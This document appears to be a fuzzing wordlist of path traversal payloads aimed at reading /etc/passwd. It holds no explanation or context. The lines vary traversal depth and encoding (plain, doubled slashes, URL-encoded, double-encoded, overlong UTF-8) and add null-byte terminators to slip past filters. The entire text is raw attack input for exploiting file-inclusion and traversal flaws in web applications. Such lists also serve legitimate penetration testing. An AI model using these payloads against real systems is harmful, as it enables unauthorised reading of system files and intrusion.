etc/passwd
/etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
//etc//passwd
..//etc//passwd
..//..//etc//passwd
..//..//..//etc//passwd
..//..//..//..//etc//passwd
..//..//..//..//..//etc//passwd
..//..//..//..//..//..//etc//passwd
..//..//..//..//..//..//..//etc//passwd
..//..//..//..//..//..//..//..//etc//passwd
..//..//..//..//..//..//..//..//..//etc//passwd
..//..//..//..//..//..//..//..//..//..//etc//passwd
etc%2fpasswd
%2fetc%2fpasswd
..%2fetc%2fpasswd
..%2f..%2fetc%2fpasswd
..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
etc%252fpasswd
%252fetc%252fpasswd
..%252fetc%252fpasswd
..%252f..%252fetc%252fpasswd
..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
etc%c0%afpasswd
%c0%afetc%c0%afpasswd
..%c0%afetc%c0%afpasswd
..%c0%af..%c0%afetc%c0%afpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
etc/passwd%00
/etc/passwd%00
../etc/passwd%00
../../etc/passwd%00
../../../etc/passwd%00
../../../../etc/passwd%00
../../../../../etc/passwd%00
../../../../../../etc/passwd%00
../../../../../../../etc/passwd%00
../../../../../../../../etc/passwd%00
../../../../../../../../../etc/passwd%00
../../../../../../../../../../etc/passwd%00
//etc//passwd%00
..//etc//passwd%00
..//..//etc//passwd%00
..//..//..//etc//passwd%00
..//..//..//..//etc//passwd%00
..//..//..//..//..//etc//passwd%00
..//..//..//..//..//..//etc//passwd%00
..//..//..//..//..//..//..//etc//passwd%00
..//..//..//..//..//..//..//..//etc//passwd%00
..//..//..//..//..//..//..//..//..//etc//passwd%00
..//..//..//..//..//..//..//..//..//..//etc//passwd%00
etc%2fpasswd%00
%2fetc%2fpasswd%00
..%2fetc%2fpasswd%00
..%2f..%2fetc%2fpasswd%00
..%2f..%2f..%2fetc%2fpasswd%00
..%2f..%2f..%2f..%2fetc%2fpasswd%00
..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
etc%252fpasswd%2500
%252fetc%252fpasswd%2500
..%252fetc%252fpasswd%2500
..%252f..%252fetc%252fpasswd%2500
..%252f..%252f..%252fetc%252fpasswd%2500
..%252f..%252f..%252f..%252fetc%252fpasswd%2500
..%252f..%252f..%252f..%252f..%252fetc%252fpasswd%2500
..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd%2500
..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd%2500
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd%2500
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd%2500
etc%c0%afpasswd%00
%c0%afetc%c0%afpasswd%00
..%c0%afetc%c0%afpasswd%00
..%c0%af..%c0%afetc%c0%afpasswd%00
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd%00
..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd%00
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd%00
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd%00
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd%00
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd%00
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd%00